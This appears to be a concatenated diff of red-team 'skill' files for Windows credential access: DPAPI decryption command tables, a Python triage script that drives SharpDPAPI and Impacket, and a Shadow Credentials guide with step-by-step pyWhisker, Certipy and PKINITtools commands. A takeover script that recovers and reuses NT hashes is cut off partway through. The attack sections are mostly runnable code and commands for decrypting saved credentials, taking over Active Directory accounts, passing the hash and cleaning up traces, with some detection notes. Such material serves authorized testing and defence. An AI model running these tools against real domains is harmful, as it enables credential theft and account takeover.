 | Command | Purpose | Example |
 |---------|---------|---------|
 | `logins` | Decrypt saved browser logins | `SharpChrome.exe logins /unprotect` |
 | `cookies` | Decrypt browser cookies | `SharpChrome.exe cookies /pvk:key.pvk` |
 | `statekeys` | Decrypt the AES app-bound state key | `SharpChrome.exe statekeys /unprotect` |
 ## Impacket dpapi.py (Linux)
 | Subcommand | Purpose | Example |
 |------------|---------|---------|
 | `masterkey` | Decrypt a master key file | `impacket-dpapi masterkey -file MK -pvk key.pvk` |
 | `credential` | Decrypt a credential blob | `impacket-dpapi credential -file CRED -key 0x<mk>` |
 | `vault` | Decrypt vault policy/creds | `impacket-dpapi vault -vpol VPOL -vcrd VCRD -key 0x<mk>` |
 | `backupkeys` | Retrieve domain backup keys | `impacket-dpapi backupkeys -t corp.local/admin@dc -pvk out.pvk` |
 ## Key File Locations
 | Path | Contents |
 |------|----------|
 | `%APPDATA%\Microsoft\Protect\<SID>\` | User master keys |
 | `%WINDIR%\System32\Microsoft\Protect\` | Machine master keys |
 | `%LOCALAPPDATA%\Microsoft\Credentials\` | Credential Manager blobs |
 | `%APPDATA%\Microsoft\Vault\` / `%LOCALAPPDATA%\Microsoft\Vault\` | Credential Vault |
 ## External References
 - SharpDPAPI README: https://github.com/GhostPack/SharpDPAPI
 - Impacket: https://github.com/fortra/impacket
@@ -0,0 +1,30 @@
 # Standards and References — Abusing DPAPI for Credential Access
 ## NIST CSF 2.0
 | ID | Name | Rationale |
 |----|------|-----------|
 | DE.CM-01 | Networks and network services are monitored to find potentially adverse events | DPAPI abuse generates detectable signals (MS-BKRP backup-key RPC to the DC, Protect/Credentials folder access, LSASS access) that monitoring must surface. |
 ## MITRE ATT&CK
 | Technique ID | Name | Tactic | Rationale |
 |--------------|------|--------|-----------|
 | T1555.004 | Credentials from Password Stores: Windows Credential Manager | Credential Access | DPAPI protects Credential Manager/Vault entries; decrypting them recovers stored credentials. |
 | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected browser logins/cookies. |
 | T1003 | OS Credential Dumping | Credential Access | Extracting master keys and the domain backup key dumps credential material. |
 ## Supporting Frameworks and Standards
 - **MS-BKRP** — BackupKey Remote Protocol; the RPC interface used to retrieve the domain DPAPI backup key.
 - **MS-DPSP / DPAPI** — Microsoft's Data Protection API specification governing master keys and blob protection.
 - **D3FEND** — Credential Eviction / Password Rotation as mitigations after DPAPI compromise.
 ## Official Resources
 - SharpDPAPI / SharpChrome: https://github.com/GhostPack/SharpDPAPI
 - Mimikatz: https://github.com/gentilkiwi/mimikatz
 - Impacket: https://github.com/fortra/impacket
 - DonPAPI: https://github.com/login-securite/DonPAPI
 - HackTricks DPAPI: https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html
 - SpecterOps "Operational Guidance for Offensive User DPAPI Abuse": https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
@@ -0,0 +1,154 @@
 #!/usr/bin/env python3
 # For authorized penetration testing and educational environments only.
 # Usage against targets without prior mutual written consent is illegal.
 # It is the end user's responsibility to obey all applicable laws.
 """DPAPI triage orchestrator.
 Locates DPAPI artifacts (master keys, Credential Manager blobs, Vault entries)
 on a mounted/exfiltrated user profile and drives SharpDPAPI (on Windows) or
 Impacket's dpapi.py (cross-platform) to decrypt them with a supplied password,
 NTLM hash, or domain backup key (.pvk).
 This is an operator helper: it builds and runs the real tool commands and
 parses their output; it does not reimplement DPAPI cryptography.
 """
 import argparse
 import os
 import shutil
 import subprocess
 import sys
 from datetime import datetime, timezone
 # Standard relative locations inside a Windows user profile.
 PROTECT_REL = os.path.join("AppData", "Roaming", "Microsoft", "Protect")
 CRED_REL = os.path.join("AppData", "Local", "Microsoft", "Credentials")
 VAULT_LOCAL_REL = os.path.join("AppData", "Local", "Microsoft", "Vault")
 VAULT_ROAM_REL = os.path.join("AppData", "Roaming", "Microsoft", "Vault")
 def find_tool(candidates):
    """Return the first available tool path from candidates, else None."""
    for name in candidates:
        path = shutil.which(name)
        if path:
            return path
    return None
 def enumerate_artifacts(profile):
    """Walk a user profile and collect DPAPI artifact file paths."""
    found = {"masterkeys": [], "credentials": [], "vaults": []}
    mapping = {
        "masterkeys": os.path.join(profile, PROTECT_REL),
        "credentials": os.path.join(profile, CRED_REL),
        "vaults": os.path.join(profile, VAULT_LOCAL_REL),
    }
    for key, base in mapping.items():
        if not os.path.isdir(base):
            continue
        for root, _dirs, files in os.walk(base):
            for fname in files:
                # Master keys are GUID-named; skip preferred/BK marker files noise.
                found[key].append(os.path.join(root, fname))
    # Also include roaming vault if present.
    vroam = os.path.join(profile, VAULT_ROAM_REL)
    if os.path.isdir(vroam):
        for root, _dirs, files in os.walk(vroam):
            for fname in files:
                found["vaults"].append(os.path.join(root, fname))
    return found
 def run_cmd(cmd, timeout):
    """Run an external command and return (rc, stdout, stderr)."""
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return proc.returncode, proc.stdout, proc.stderr
    except FileNotFoundError:
        return 127, "", f"tool not found: {cmd[0]}"
    except subprocess.TimeoutExpired:
        return 124, "", f"timeout after {timeout}s"
 def decrypt_masterkey_impacket(tool, mk_file, pvk, timeout):
    """Decrypt one master key file via impacket-dpapi using a backup .pvk."""
    cmd = [tool, "masterkey", "-file", mk_file, "-pvk", pvk]
    rc, out, err = run_cmd(cmd, timeout)
    return {"file": mk_file, "rc": rc, "output": (out or err).strip()[:2000]}
 def sharpdpapi_triage(tool, profile, pvk, password, ntlm, timeout):
    """Build and run a SharpDPAPI triage command appropriate to the inputs."""
    cmd = [tool, "triage"]
    if pvk:
        cmd += [f"/pvk:{pvk}"]
    elif password:
        cmd += [f"/password:{password}"]
    elif ntlm:
        cmd += [f"/ntlm:{ntlm}"]
    else:
        cmd += ["/unprotect"]
    rc, out, err = run_cmd(cmd, timeout)
    return {"rc": rc, "output": (out or err).strip()}
 def main():
    parser = argparse.ArgumentParser(description="Authorized DPAPI triage helper")
    parser.add_argument("--profile", help="Path to a (mounted) Windows user profile")
    parser.add_argument("--pvk", help="Domain DPAPI backup key (.pvk)")
    parser.add_argument("--password", help="User plaintext password")
    parser.add_argument("--ntlm", help="User NTLM hash")
    parser.add_argument("--mode", choices=["enumerate", "impacket", "sharpdpapi"],
                        default="enumerate",
                        help="enumerate artifacts, or drive a decryption tool")
    parser.add_argument("--timeout", type=int, default=120, help="Per-command timeout")
    args = parser.parse_args()
    ts = datetime.now(timezone.utc).isoformat()
    print(f"[*] DPAPI triage helper — {ts}")
    print("[!] Authorized use only. Confirm rules-of-engagement before proceeding.\n")
    if args.mode in ("enumerate", "impacket"):
        if not args.profile or not os.path.isdir(args.profile):
            print("[!] --profile must point to an existing user profile directory",
                  file=sys.stderr)
            sys.exit(2)
        artifacts = enumerate_artifacts(args.profile)
        for kind, items in artifacts.items():
            print(f"--- {kind.upper()} ({len(items)}) ---")
            for p in items:
                print(f"  {p}")
        if args.mode == "impacket":
            if not args.pvk:
                print("\n[!] --pvk required for impacket master key decryption",
                      file=sys.stderr)
                sys.exit(2)
            tool = find_tool(["impacket-dpapi", "dpapi.py"])
            if not tool:
                print("[!] impacket-dpapi not found. Install: pipx install impacket",
                      file=sys.stderr)
                sys.exit(2)
            print("\n=== Decrypting master keys with backup key ===")
            for mk in artifacts["masterkeys"]:
                res = decrypt_masterkey_impacket(tool, mk, args.pvk, args.timeout)
                print(f"  [{res['rc']}] {res['file']}")
                if res["output"]:
                    print(f"      {res['output'][:300]}")
        return
    # sharpdpapi mode (Windows operator host)
    tool = find_tool(["SharpDPAPI.exe", "SharpDPAPI"])
    if not tool:
        print("[!] SharpDPAPI not found on PATH. Build from "
              "https://github.com/GhostPack/SharpDPAPI", file=sys.stderr)
        sys.exit(2)
    result = sharpdpapi_triage(tool, args.profile, args.pvk, args.password,
                               args.ntlm, args.timeout)
    print("=== SharpDPAPI triage ===")
    print(result["output"])
    sys.exit(0 if result["rc"] == 0 else 1)
 if __name__ == "__main__":
    main()
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,185 @@
 ---
 name: abusing-shadow-credentials-for-privesc
 description: Take over Active Directory user and computer accounts by writing alternate certificate keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, and Certipy, then authenticate via PKINIT.
 domain: cybersecurity
 subdomain: red-teaming
 tags:
 - red-team
 - active-directory
 - shadow-credentials
 - pywhisker
 - certipy
 - pkinit
 - key-credential-link
 - privilege-escalation
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.AA-05
 mitre_attack:
 - T1098.005
 ---
 # Abusing Shadow Credentials for Privilege Escalation
 > **Legal Notice:** This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
 ## Overview
 The **Shadow Credentials** technique abuses the `msDS-KeyCredentialLink` attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's `msDS-KeyCredentialLink` — typically granted by `GenericWrite`, `GenericAll`, `WriteProperty`, or `AddKeyCredentialLink` ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover **without resetting the password**, which is far stealthier than a forced password reset.
 The technique was published by Elad Shamir (*"Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover"*) and implemented in the C# tool **Whisker**. The Python equivalent **pyWhisker** (ShutdownRepo) manipulates the attribute over LDAP, and **Certipy** integrates the entire chain via `certipy shadow auto`. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: [pyWhisker](https://github.com/ShutdownRepo/pywhisker), [Whisker](https://github.com/eladshamir/Whisker), [The Hacker Recipes — Shadow Credentials](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials).
 ## When to Use
 - When BloodHound reveals `GenericWrite`/`GenericAll`/`AddKeyCredentialLink` over a higher-value user or computer
 - As a stealthier alternative to `ForceChangePassword` (no password reset = less disruption/alerting)
 - To take over a computer account to chain into Resource-Based Constrained Delegation (RBCD)
 - During red-team operations needing account takeover without locking out the legitimate user
 - For purple-team exercises generating `msDS-KeyCredentialLink` modification telemetry
 ## Prerequisites
 - Authorized engagement scope including AD credential-access techniques
 - Control of a principal with write access to the target's `msDS-KeyCredentialLink`
 - A DC running Windows Server 2016+ with PKINIT enabled (domain functional level supporting Key Trust)
 - Network reachability to LDAP (389/636) and Kerberos (88) on a DC
 - Linux attack host with Python 3.8+; install the tooling:
  ```bash
  # pyWhisker (from source)
  git clone https://github.com/ShutdownRepo/pywhisker
  cd pywhisker && pip install .
  # Certipy (integrated shadow attack)
  pipx install certipy-ad
  # PKINITtools for manual TGT/NT-hash extraction
  git clone https://github.com/dirkjanm/PKINITtools
  ```
 ## Objectives
 - Confirm write access over a target's `msDS-KeyCredentialLink`
 - Generate a key pair and append a Key Credential to the target object
 - Request a TGT for the target via PKINIT using the new key
 - Recover the target's NT hash for pass-the-hash / further movement
 - Clean up the injected Key Credential to restore the object's state
 - Document the ACL path that enabled the attack for remediation
 ## MITRE ATT&CK Mapping
 | ID | Technique | Application in this skill |
 |----|-----------|---------------------------|
 | T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential (device key) to `msDS-KeyCredentialLink` to register an alternate authentication credential for the target account |
 ## Workflow
 ### Step 1: Confirm the write primitive
 List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the `add` step.
 ```bash
 python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "list"
 ```
 ### Step 2: Add a Shadow Credential with pyWhisker
 Generate a certificate/key pair and write it into the target's `msDS-KeyCredentialLink`. pyWhisker outputs a PFX you control.
 ```bash
 python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "add" --filename victim_shadow
 # Produces victim_shadow.pfx and prints the PFX password
 ```
 Use Kerberos auth instead of a password if you only hold a ticket:
 ```bash
 python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
    --target "victim" --action "add" --filename victim_shadow --use-ldaps
 ```
 ### Step 3: Request a TGT via PKINIT
 Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.
 ```bash
 python3 PKINITtools/gettgtpkinit.py \
    -cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
    corp.local/victim victim.ccache
 ```
 ### Step 4: Recover the NT hash
 Extract the target's NT hash from the AS-REP using the session key from Step 3 (`getnthash.py` reads the AS-REP encryption key, displayed by `gettgtpkinit.py`).
 ```bash
 export KRB5CCNAME=victim.ccache
 python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
 # Prints the NT hash for 'victim'
 ```
 ### Step 5: One-shot alternative with Certipy
 Certipy's `shadow auto` performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.
 ```bash
 certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim'
 # For a computer account, use the sAMAccountName with trailing $
 certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'
 ```
 ### Step 6: Use the recovered credential
 Authenticate with the NT hash (or the TGT) to continue the engagement.
 ```bash
 # Pass-the-hash with NetExec
 nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
 # Or use the TGT directly
 export KRB5CCNAME=victim.ccache
 nxc smb dc.corp.local -u victim --use-kcache
 ```
 ### Step 7: Chain computer takeover into RBCD (optional)
 When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.
 ```bash
 # Set RBCD so attacker-controlled SPN can impersonate to WS01$
 impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
    -action write 'corp.local/attacker:Passw0rd!'
 ```
 ### Step 8: Clean up
 Remove the injected Key Credential to restore the object and reduce detection footprint.
 ```bash
 # pyWhisker: remove by device-id (printed during add) or clear all you added
 python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "remove" --device-id <DEVICE-ID>
 # Certipy shadow auto cleans up automatically; otherwise:
 certipy shadow clear -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim'
 ```
 ## Tools and Resources
 | Resource | Purpose | Link |
 |----------|---------|------|
 | pyWhisker | Python LDAP manipulation of msDS-KeyCredentialLink | https://github.com/ShutdownRepo/pywhisker |
 | Whisker | Original C# implementation | https://github.com/eladshamir/Whisker |
 | Certipy | `shadow auto` end-to-end takeover | https://github.com/ly4k/Certipy |
 | PKINITtools | gettgtpkinit / getnthash | https://github.com/dirkjanm/PKINITtools |
 | The Hacker Recipes | Technique walkthrough & defenses | https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials |
 ## Detection and Remediation Notes
 | Area | Guidance |
 |------|----------|
 | Detection | Monitor Windows Security Event ID 5136 (directory object modified) for changes to `msDS-KeyCredentialLink`; alert when a non-AD-Connect/non-Intune principal writes the attribute. |
 | Auditing | Enable directory service object change auditing on user/computer OUs. |
 | Least privilege | Remove unnecessary `GenericWrite`/`GenericAll`/`AddKeyCredentialLink` ACEs (BloodHound `AddKeyCredentialLink` edge). |
 | Mitigation | Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts. |
 ## Validation Criteria
 - [ ] Write access over the target's `msDS-KeyCredentialLink` confirmed (`list` succeeded)
 - [ ] Key Credential successfully added (PFX generated)
 - [ ] PKINIT TGT obtained for the target account
 - [ ] Target NT hash recovered and validated against a service
 - [ ] (If computer) RBCD chain or onward movement demonstrated
 - [ ] Injected Key Credential removed / object restored
 - [ ] Enabling ACL path documented with remediation recommendation
@@ -0,0 +1,68 @@
 # Shadow Credentials Tooling Reference
 ## pyWhisker (https://github.com/ShutdownRepo/pywhisker)
 Invocation: `python3 pywhisker.py [auth] --target <obj> --action <action> [opts]`
 | Flag | Meaning |
 |------|---------|
 | `-d DOMAIN` | Target domain (FQDN) |
 | `-u USER` | Controlled username |
 | `-p PASSWORD` | Password |
 | `-k` / `--no-pass` | Kerberos auth (uses KRB5CCNAME) |
 | `-H LM:NT` | Pass-the-hash |
 | `--target NAME` | Target user/computer whose attribute is modified |
 | `--action list` | Enumerate existing Key Credentials |
 | `--action add` | Generate key pair, write Key Credential |
 | `--action remove` | Remove one Key Credential by `--device-id` |
 | `--action clear` | Remove all Key Credentials |
 | `--action info` | Show details of a Key Credential |
 | `--filename NAME` | Output PFX/PEM base name |
 | `--export PEM|PFX` | Output format (default PFX) |
 | `--device-id GUID` | Target device for remove/info |
 | `--dc-ip IP` | Domain Controller IP |
 | `--use-ldaps` | Use LDAPS (636) |
 ### Example
 ```bash
 python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
    --target victim --action add --filename victim_shadow
 ```
 ## Certipy `shadow` (https://github.com/ly4k/Certipy)
 | Command | Meaning |
 |---------|---------|
 | `certipy shadow auto` | Add → PKINIT → dump NT hash → cleanup (end to end) |
 | `certipy shadow add` | Add Key Credential only |
 | `certipy shadow list` | List Key Credentials |
 | `certipy shadow clear` | Clear Key Credentials |
 | `certipy shadow info` | Show Key Credential info |
 Key flags: `-u USER@DOMAIN`, `-p PW` / `-hashes :NT` / `-k -no-pass`,
 `-dc-ip IP`, `-account TARGET` (use trailing `$` for computers), `-ns IP`, `-dns-tcp`.
 ### Example
 ```bash
 certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'
 ```
 ## PKINITtools (https://github.com/dirkjanm/PKINITtools)
 | Script | Purpose |
 |--------|---------|
 | `gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache` | Request TGT via PKINIT; prints AS-REP key |
 | `getnthash.py -key <AS-REP-KEY> DOMAIN/USER` | Recover NT hash (KRB5CCNAME set) |
 ### Example
 ```bash
 python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
    corp.local/victim victim.ccache
 export KRB5CCNAME=victim.ccache
 python3 getnthash.py -key <AS-REP-KEY> corp.local/victim
 ```
 ## Detection signal
 - Event ID 5136 — modification of `msDS-KeyCredentialLink` (Directory Service Changes auditing).
 - BloodHound edge: `AddKeyCredentialLink`.
@@ -0,0 +1,21 @@
 # Standards Mapping — Abusing Shadow Credentials for Privilege Escalation
 ## MITRE ATT&CK (Enterprise)
 | ID | Name | Rationale |
 |----|------|-----------|
 | T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential to `msDS-KeyCredentialLink` registers an alternate device/certificate credential for the target, which is exactly the device-registration manipulation this sub-technique describes. |
 Reference: https://attack.mitre.org/techniques/T1098/005/
 Related techniques exercised in the chain:
 - T1649 (Steal or Forge Authentication Certificates) — the PKINIT certificate used to authenticate.
 - T1550.003 / T1558 — using the recovered TGT/hash for movement.
 ## NIST Cybersecurity Framework 2.0
 | ID | Name | Rationale |
 |----|------|-----------|
 | PR.AA-05 | Access permissions, entitlements, and authorizations are defined, managed, and enforced incorporating least privilege and separation of duties | The attack is only possible because of over-permissive ACEs (`GenericWrite`/`GenericAll`/`AddKeyCredentialLink`) on AD objects; remediation is least-privilege enforcement of who may write Key Credentials. |
 Reference: https://csrc.nist.gov/projects/cybersecurity-framework
@@ -0,0 +1,145 @@
 #!/usr/bin/env python3
 """
 shadowcred_takeover.py — Orchestrate a Shadow Credentials account takeover.
 Wraps the real `certipy shadow auto` workflow (and optionally pyWhisker +
 PKINITtools) to add a Key Credential to a target's msDS-KeyCredentialLink,
 recover the NT hash via PKINIT, and clean up. Parses the tool output to surface
 the recovered NT hash and TGT path.
 Authorized use only. Requires write access over the target's
 msDS-KeyCredentialLink and a DC running Windows Server 2016+ with PKINIT.
 Install:
    pipx install certipy-ad
    git clone https://github.com/ShutdownRepo/pywhisker
    git clone https://github.com/dirkjanm/PKINITtools
 Examples:
    python shadowcred_takeover.py certipy -u attacker@corp.local -p 'Passw0rd!' \
        --dc-ip 10.0.0.100 --target 'WS01$'
    python shadowcred_takeover.py pywhisker -d corp.local -u attacker \
        -p 'Passw0rd!' --dc-ip 10.0.0.100 --target victim \
        --pywhisker ./pywhisker/pywhisker.py
 """
 import argparse
 import os
 import re
 import shutil
 import subprocess
 import sys
 def _which_or_die(binary, hint):
    if shutil.which(binary) is None and not os.path.exists(binary):
        sys.exit(f"[!] '{binary}' not found. {hint}")
 def run(cmd, timeout=600):
    print("[*] Running:", " ".join(cmd))
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        sys.exit(f"[!] Command timed out after {timeout}s.")
    out = proc.stdout + proc.stderr
    print(out)
    return proc.returncode, out
 def parse_nthash(text):
    """Certipy prints 'Got hash for ...: aad3b...:<NT>'. Extract the NT half."""
    m = re.search(r"[Gg]ot hash for .*?:\s*([0-9a-fA-F]{32}):([0-9a-fA-F]{32})", text)
    if m:
        return m.group(2)
    m = re.search(r"\b[0-9a-fA-F]{32}:([0-9a-fA-F]{32})\b", text)
    return m.group(1) if m else None
 def certipy_flow(args):
    _which_or_die("certipy", "Install with: pipx install certipy-ad")
    cmd = ["certipy", "shadow", "auto",
           "-u", args.user, "-dc-ip", args.dc_ip, "-account", args.target]
    if args.password:
        cmd += ["-p", args.password]
    elif args.hashes:
        cmd += ["-hashes", args.hashes]
    elif args.kerberos:
        cmd += ["-k", "-no-pass"]
    else:
        sys.exit("[!] Provide -p, --hashes, or -k.")
    if args.ns:
        cmd += ["-ns", args.ns, "-dns-tcp"]
    rc, out = run(cmd)
    if rc != 0:
        sys.exit("[!] certipy shadow auto failed.")
    nt = parse_nthash(out)
    if nt:
        print(f"\n[+] Recovered NT hash for {args.target}: {nt}")
        print(f"[+] Reuse it: nxc smb {args.dc_ip} -u {args.target.rstrip('$')} -H {nt}")
    else:
        print("[!] Could not auto-extract NT hash; review output above.")
 def pywhisker_flow(args):
    if not args.pywhisker or not os.path.exists(args.pywhisker):
        sys.exit("[!] --pywhisker must point to pywhisker.py")
    base = "shadow_" + args.target.rstrip("$")
    cmd = ["python3", args.pywhisker, "-d", args.domain, "-u", args.user,
           "--target", args.target, "--action", "add", "--filename", base]
    if args.password:
        cmd += ["-p", args.password]
    elif args.kerberos:
        cmd += ["-k", "--no-pass"]
    else:
        sys.exit("[!] Provide -p or -k.")
    if args.dc_ip:
        cmd += ["--dc-ip", args.dc_ip]
    rc, out = run(cmd)
    if rc != 0:
